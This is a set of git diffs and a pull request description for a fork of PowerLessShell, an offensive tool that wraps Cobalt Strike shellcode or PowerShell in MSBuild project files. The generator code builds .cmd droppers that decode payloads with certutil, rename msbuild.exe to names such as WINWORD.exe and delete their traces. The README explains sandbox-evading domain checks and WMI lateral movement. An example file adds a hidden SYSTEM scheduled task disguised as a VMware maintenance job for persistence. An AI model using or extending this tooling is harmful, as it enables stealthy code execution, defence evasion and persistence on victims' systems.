+                        gen.print_error("Failed to write the output to %s.cmd" % outfile)
+
+                print("\n\n[+] %s was generated.\n[+] %s.cmd was generated.\n[+] Run the command inside of %s.cmd on the target system using WMI." % (outfile, outfile, outfile))
+        except KeyboardInterrupt:
+                        print("")
+                        gen.print_error("Exiting")
+                        exit(0)

--- a/PowerLessShell.py
+++ b/PowerLessShell.py
@@ -1,6 +1,5 @@
 #!/usr/bin/env python2
 # Author: Mr.Un1k0d3r - RingZer0 Team 2017
-# with cmd enhancements by blark
 
 from __future__ import print_function
 import random
@@ -100,9 +99,9 @@ class Generator:
                 for i in xrange(3):
                     filepath.append(self.gen_str(random.randrange(8, 18)))
 
-                # if user is SYSTEM then use the msbuild path and perform msbuild copy
-                # otherwise work out of %temp% and don't copy the binary
-                # finally, if the decoded file already exists, just run it
+                # The cmd file first does a quck check for write access to the msbuild folder,
+                # if its unavailable use %temp% working directory instead. Next, check if the
+                # payload has already been decoded and skip re-creating the file if it exists.
                 payload = ("@ECHO OFF\r\n"
                            "set w=0 && set p=\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\r\n"
                            "copy /Y NUL %p%\\{2} > NUL 2>&1 && set w=1\r\n"
@@ -122,7 +121,7 @@ class Generator:
                         msbuild = self.gen_process()
                 else:
                         msbuild = self.gen_str(random.randrange(5, 25)) + ".exe"
-                # decode paylod, copy msbuild, launch payload
+                # Decode paylod, copy msbuild, launch payload, delete files
                 payload += ("\r\ncertutil -decodehex %f0% %f1%\r\n"
                             "del %f0%\r\n"
                             "IF %w%==1 (copy %p%\\msbuild.exe %p%\\{0})\r\n"

--- a/PowerLessShell.py
+++ b/PowerLessShell.py
@@ -97,9 +97,8 @@ class Generator:
         def gen_final_cmd(self, path):
                 size = 0
                 filepath = []
-                filepath.append(self.gen_str(random.randrange(8, 18)))
-                filepath.append(self.gen_str(random.randrange(8, 18)))
-                filepath.append(self.gen_str(random.randrange(8, 18)))
+                for i in xrange(3):
+                    filepath.append(self.gen_str(random.randrange(8, 18)))
 
                 # if user is SYSTEM then use the msbuild path and perform msbuild copy
                 # otherwise work out of %temp% and don't copy the binary
@@ -108,8 +107,7 @@ class Generator:
                            "set w=0 && set p=\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\r\n"
                            "copy /Y NUL %p%\\{2} > NUL 2>&1 && set w=1\r\n"
                            "IF %w%==1 (del %p%\\{2}) ELSE (set p=%temp%)\r\n"
-                           "set f0=%p%\\{0}\r\n"
-                           "set f1=%p%\\{1}\r\n"
+                           "set f0=%p%\\{0} && set f1=%p%\\{1}\r\n"
                            "IF EXIST %f1% (GOTO RUN)\r\n"
                            ).format(filepath[0], filepath[1], filepath[2])
 

--- a/README.md
+++ b/README.md
@@ -1,12 +1,12 @@
 # PowerLessShell
 
-*PowerLessShell uses MSBuild.exe to execute PowerShell scripts and commands or raw shellcode without spawning powershell.exe.*
+**PowerLessShell uses MSBuild.exe to execute PowerShell scripts and commands or raw shellcode without spawning powershell.exe.**
 
 *This is a fork from https://github.com/Mr-Un1k0d3r/PowerLessShell. This fork contains documentation changes and payload and various functionality enhancements.*
 
 ### How it works
 
-PowerLessShell reads in the desired input file, encrypts it with RC4 and then base64 encodes it. After this an msbuild project template is populated with the payload and key to decrypt it. The rest of the magic is taken care of by the csproj template created by [Mr-Un1k0d3r](https://github.com/Mr-Un1k0d3r/PowerLessShell) which uses MSBuild's capability of running inline tasks in build files to execute the necessary code. 
+PowerLessShell reads in the desired input file, encrypts it with RC4 and then hex encodes it. After this an msbuild project template is populated with the payload and key to decrypt it. The rest of the magic is taken care of by the csproj template created by [Mr-Un1k0d3r](https://github.com/Mr-Un1k0d3r/PowerLessShell) which uses MSBuild's capability of running inline tasks in build files to execute the necessary code. This is then base64 encoded and stuck inside of a cmd file that has a bit of logic in it to decode the payload with certutil and launch it in the correct directory based on user context. Check the source code if you want any more details...
 
 #### Templates
 
@@ -17,22 +17,57 @@ Templates are located in the repo under PowerLessShell/include:
 
 The script obfuscates variables from the template. Variables should be named with VAR + a number (i.e. "VAR1").
 
+### Prerequisites
+
+This fork uses [Click](http://click.pocoo.org/5/) for command line input.  To install it from PyPI:
+
+```
+pip install click
+```
+
 
 
 ## Usage
 
-### Example
+### Payloads
 
 Generate shellcode with Cobalt Strike, using `Attacks > Packages > Payload Generator` or for a stageless payload use `Attacks > Packages > Windows Executable (S)` select "Raw" and save the file somewhere convenient.
 
 Alternatively you can supply an arbitrary PowerShell script to be run instead of shellcode. Generate or obtain these the usual ways.
 
+### Help
+
 ```
-$ python PowerLessShell.py
+$ ./PowerLessShell.py --help
+Usage: PowerLessShell.py [OPTIONS] [PAYLOAD] [OUTFILE]
 
+  Accepts a powershell script or raw shellcode, then encrypts with RC4,
+  base64 encodes, and sticks into a csproj template to be executed as inline
+  task on the client side. The csproj is then hex encoded and output as a
+  cmd file to be launched on a target machine using wmi or schtask, etc. The
+  command file uses certutil to decode the csproj, renames msbuild (if
+  admin), and then launch the payload.
 
-PowerLessShell - Remain Stealthu
-         More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team
+  [PAYLOAD] defaults to ./beacon.bin
+  [OUTFILE] defaults to ./output/payload.cmd
+
+Options:
+  -k, --kind [ps|sc]  Powershell (ps) or shellcode (sc) input file, script
+                      tries to autodetect based on extension (ps1=powershell,
+                      bin=shellcode).
+  --known-process     Disguise msbuild as a common Windows executable
+  -d, --domain TEXT   Domain name to check for prior to running payload
+  --csproj-out        Also output the csproj file
+  --help              Show this message and exit.
+```
+
+### Example
+
+If the file `beacon.bin` is in the current directory and the output directory `output` already exists, you can just run the script and everything should be detected.
+
+```
+./PowerLessShell.py
+PowerLessShell - More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team / blark's fork
             ___
         .-"; ! ;"-.
       .'!  : | :  !`.
@@ -47,25 +82,31 @@ PowerLessShell - Remain Stealthu
         |`._`n'_.'|
         `----^----"
 
-
-(Set payload type 'powershell, shellcode')>>> shellcode
-
-(Path to the raw shellcode file)>>> shellcode.bin
-
-(Path for the generated MsBuild out file)>>> payload.csproj
-
-(Set USERDOMAIN condition (Default ''))>>> RingZer0
-
-(Use known process name to perform MsBuild renaming (Default: False))>>>
-
-[+] payload.csproj was generated.
-[+] payload.csproj.cmd was generated.
-[+] Run the command inside of payload.csproj.cmd on the target system using WMI.
+Using payload file beacon.bin, type shellcode
+Not writing csproj to disk, if you want this use the --csproj switch
+Writing ./output/payload.cmd
 ```
 
-**Notes:**
+Otherwise you can do something like this:
+
+```
+$ ./PowerLessShell.py -k ps --csproj-out --known-process leetpayload.txt icq_updater.cmd
+```
+
+<stdin> and <stdout> work too:
+
+```
+$ cat payload.ps1 | ./PowerLessShell.py -k ps - stdin.cmd
+$ ./PowerLessShell.py leetscript.ps1 - | xclip
+```
+
+**Notes**:
+
 - In order to prevent the payload from running in an analysis environment the USERDOMAIN condition create a check to see if the user's domain matches the one provided before executing the payload. This is an optional parameter.
+
 - Known process name will cause the msbuild.exe to be renamed to something like WINWORD.exe instead of a randomly generated string (see code for exact list of names).
+
+  ​
 
 
 
@@ -104,6 +145,8 @@ See the following for more information:
 
 **By MrT-F**
 
+*This script needs updating to match the new command line...*
+
 cd into your cobalt strike client directory
 ```
 cd /root/cobaltstrike
@@ -122,5 +165,9 @@ wmi_msbuild [target] [listener]
 
 ## Credit
 
-Mr.Un1k0d3r RingZer0 Team 2017
+Original code by Mr.Un1k0d3r RingZer0 Team 2017
+
+
+
+
 

--- a/README.md
+++ b/README.md
@@ -66,7 +66,7 @@ Options:
 If the file `beacon.bin` is in the current directory and the output directory `output` already exists, you can just run the script and everything should be detected.
 
 ```
-./PowerLessShell.py
+$ ./PowerLessShell.py
 PowerLessShell - More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team / blark's fork
             ___
         .-"; ! ;"-.
@@ -93,7 +93,7 @@ Otherwise you can do something like this:
 $ ./PowerLessShell.py -k ps --csproj-out --known-process leetpayload.txt icq_updater.cmd
 ```
 
-<stdin> and <stdout> work too:
+&lt;stdin&gt; and &lt;stdout&gt; work too:
 
 ```
 $ cat payload.ps1 | ./PowerLessShell.py -k ps - stdin.cmd

--- a/README.md
+++ b/README.md
@@ -1,42 +1,37 @@
 # PowerLessShell
 
-PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. 
-You can also execute raw shellcode using the same approach.
+*PowerLessShell uses MSBuild.exe to execute PowerShell scripts and commands or raw shellcode without spawning powershell.exe.*
 
-To add another layer of crap the payload will copy msbuild.exe to something random and build the payload using the randomly generated binary.
+*This is a fork from https://github.com/Mr-Un1k0d3r/PowerLessShell. This fork contains documentation changes and payload and various functionality enhancements.*
 
-* You can provide -knownprocess switch to use known Windows process name instead of renaming MsBuild.exe to something random
+### How it works
 
-# MSBuild conditions 
+PowerLessShell reads in the desired input file, encrypts it with RC4 and then base64 encodes it. After this an msbuild project template is populated with the payload and key to decrypt it. The rest of the magic is taken care of by the csproj template created by [Mr-Un1k0d3r](https://github.com/Mr-Un1k0d3r/PowerLessShell) which uses MSBuild's capability of running inline tasks in build files to execute the necessary code. 
 
-MSBuild support condition that can be used to avoid running code if the condition is not met.
+#### Templates
 
-```
-<Target Name="x" Condition="'$(USERDOMAIN)'=='RingZer0'">
-```
+Templates are located in the repo under PowerLessShell/include:
 
-The malicious code will only be executed if the current user domain is "RingZer0"
+- template-powershell.csproj
+- template-shellcode.csproj
 
-Condition supports several other formats that can be used to create more conditional execution check.
+The script obfuscates variables from the template. Variables should be named with VAR + a number (i.e. "VAR1").
 
-```
-<Target Name="x" Condition="'$(registry:HKEY_LOCAL_MACHINE\blah@blah)'>='0'">
-```
 
-Property Functions also expose interesting data.
 
-```
-https://docs.microsoft.com/en-us/visualstudio/msbuild/property-functions
-```
+## Usage
 
-# Usage
+### Example
 
-Raw shellcode
+Generate shellcode with Cobalt Strike, using `Attacks > Packages > Payload Generator` or for a stageless payload use `Attacks > Packages > Windows Executable (S)` select "Raw" and save the file somewhere convenient.
+
+Alternatively you can supply an arbitrary PowerShell script to be run instead of shellcode. Generate or obtain these the usual ways.
+
 ```
 $ python PowerLessShell.py
 
 
-PowerLessShell - Remain Stealth
+PowerLessShell - Remain Stealthu
          More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team
             ___
         .-"; ! ;"-.
@@ -55,7 +50,7 @@ PowerLessShell - Remain Stealth
 
 (Set payload type 'powershell, shellcode')>>> shellcode
 
-(Path to the raw shellcode file)>>> shellcode.raw
+(Path to the raw shellcode file)>>> shellcode.bin
 
 (Path for the generated MsBuild out file)>>> payload.csproj
 
@@ -68,79 +63,46 @@ PowerLessShell - Remain Stealth
 [+] Run the command inside of payload.csproj.cmd on the target system using WMI.
 ```
 
-Powershell
-```
-$ python PowerLessShell.py
-
-
-PowerLessShell - Remain Stealth
-         More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team
-            ___
-        .-"; ! ;"-.
-      .'!  : | :  !`.
-     /\  ! : ! : !  /\
-    /\ |  ! :|: !  | /\
-   (  \ \ ; :!: ; / /  )
-  ( `. \ | !:|:! | / .' )
-  (`. \ \ \!:|:!/ / / .')
-   \ `.`.\ |!|! |/,'.' /
-    `._`.\\!!!// .'_.'
-       `.`.\|//.'.'
-        |`._`n'_.'|
-        `----^----"
-
-
-(Set payload type 'powershell, shellcode')>>> powershell
-
-(Path to the PowerShell script)>>> payload.ps1
-
-(Path for the generated MsBuild out file)>>> payload.csproj
-
-(Set USERDOMAIN condition (Default ''))>>>
-
-(Use known process name to perform MsBuild renaming (Default: False))>>>
-
-[+] payload.csproj was generated.
-[+] payload.csproj.cmd was generated.
-[+] Run the command inside of payload.csproj.cmd on the target system using WMI.
-```
-
-Inline command
-```
-python PowerLessShell.py powershell.ps1 output (optional shellcode, -knownprocess)
-
-
-PowerLessShell - Remain Stealth
-         More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team
-            ___
-        .-"; ! ;"-.
-      .'!  : | :  !`.
-     /\  ! : ! : !  /\
-    /\ |  ! :|: !  | /\
-   (  \ \ ; :!: ; / /  )
-  ( `. \ | !:|:! | / .' )
-  (`. \ \ \!:|:!/ / / .')
-   \ `.`.\ |!|! |/,'.' /
-    `._`.\\!!!// .'_.'
-       `.`.\|//.'.'
-        |`._`n'_.'|
-        `----^----"
+**Notes:**
+- In order to prevent the payload from running in an analysis environment the USERDOMAIN condition create a check to see if the user's domain matches the one provided before executing the payload. This is an optional parameter.
+- Known process name will cause the msbuild.exe to be renamed to something like WINWORD.exe instead of a randomly generated string (see code for exact list of names).
 
 
 
-
-[+] output was generated.
-[+] output.cmd was generated.
-[+] Run the command inside of output.cmd on the target system using WMI.
-```
-
-# Example
+## Screenshot
 
 The following example is running the RC4 RAT https://github.com/Mr-Un1k0d3r/RC4-PowerShell-RAT without running a single instance of PowerShell
 
 ![PowerLessShell](https://ringzer0team.com/powershellless.png)
 
-# Cobalt Strike Aggressor script (wmi_msbuild.cna) By MrT-F
+
+
+## MSBuild conditions
+
+MSBuild conditions can be used to avoid running code in unintended (read: analysis) environments.
+
+```
+<Target Name="x" Condition="'$(USERDOMAIN)'=='RingZer0'">
+```
+
+The malicious code will only be executed if the current domain is "RingZer0"
+
+Several conditions can be used to create more thorough execution check, for example:
+
+```
+<Target Name="x" Condition="'$(registry:HKEY_LOCAL_MACHINE\blah@blah)'>='0'">
+```
+
+See the following for more information:
+
+- [MSBuild Conditions](https://msdn.microsoft.com/en-us/library/7szfhaft.aspx)
+- [Property Functions](https://docs.microsoft.com/en-us/visualstudio/msbuild/property-functions).
+
+
+
+## Cobalt Strike Aggressor script (wmi_msbuild.cna)
+
+**By MrT-F**
 
 cd into your cobalt strike client directory
 ```
@@ -156,6 +118,9 @@ Laterally move just like other Cobalt Strike macros:
 wmi_msbuild [target] [listener]
 ```
 
-# Credit
+
+
+## Credit
+
 Mr.Un1k0d3r RingZer0 Team 2017
 

--- a/examples/README.md
+++ b/examples/README.md
@@ -1,0 +1,13 @@
+# Examples
+
+## Sample schtasks.exe XML
+
+The sample task will attempt to run every minute. It will not run if the task is already running.
+
+This task requires SYSTEM or Local Administrator access to create. Be sure to customize the path before you use it.
+
+The task XML can be imported with the following command line:
+
+```
+schtasks /create /xml <filename> /tn <taskname>
+```

--- a/examples/sample_task_system.xml
+++ b/examples/sample_task_system.xml
@@ -1,0 +1,44 @@
+<?xml version="1.0" encoding="UTF-16"?>
+<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
+  <RegistrationInfo>
+    <Date>2017-08-25T23:02:08.7269771</Date>
+    <Author>VMWare installer</Author>
+    <Description>Vmware tools maintenance task</Description>
+    <URI>\vmtools</URI>
+  </RegistrationInfo>
+  <Principals>
+    <Principal id="Author">
+      <UserId>NT AUTHORITY\SYSTEM</UserId>
+      <RunLevel>HighestAvailable</RunLevel>
+    </Principal>
+  </Principals>
+  <Settings>
+    <AllowHardTerminate>false</AllowHardTerminate>
+    <DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter>
+    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
+    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
+    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
+    <Hidden>true</Hidden>
+    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
+    <StartWhenAvailable>true</StartWhenAvailable>
+    <WakeToRun>true</WakeToRun>
+    <IdleSettings>
+      <StopOnIdleEnd>false</StopOnIdleEnd>
+      <RestartOnIdle>false</RestartOnIdle>
+    </IdleSettings>
+  </Settings>
+  <Triggers>
+    <TimeTrigger>
+      <StartBoundary>2017-08-25T00:00:00</StartBoundary>
+      <EndBoundary>2020-01-01T00:00:00</EndBoundary>
+      <Repetition>
+        <Interval>PT1M</Interval>
+      </Repetition>
+    </TimeTrigger>
+  </Triggers>
+  <Actions Context="Author">
+    <Exec>
+      <Command>C:\Users\Administrator\Desktop\testing.cmd</Command>
+    </Exec>
+  </Actions>
+</Task>


### PR DESCRIPTION
The generated .cmd file isn't guaranteed to be allowed to exit cleanly, hence the last few commands which deleted the generated files weren't run. This caused a problem for certutil which would then error and blow everything up. Because it was all in the same line this made the payload stop working. I dealt with this issue by:

- The first echo command uses a single ">" instead of ">>" so the first file doesn't grow huge in case some delete command doesn't work.
- Added a check to the .bat file for write access to the msbuild directory, the script will switch to %temp% as a workdir if there is no access, and skips msbuild renaming
- If the decoded hex payload already exists, just run it instead of decoding everything again (this happens when scheduled tasks expire or get killed)
- Used \r\n at the end of each line because errors were causing the whole thing to stop with ' && ' between commands and making it way harder to debug

I also added a schtasks xml output to /examples for an example task that works well on my test system.

Oh and some stuff you might not like: 
- I got tired of typing in "shellcode" so I switched to that to "s" (and "p" for powershell).
- Switched to print from Python 3
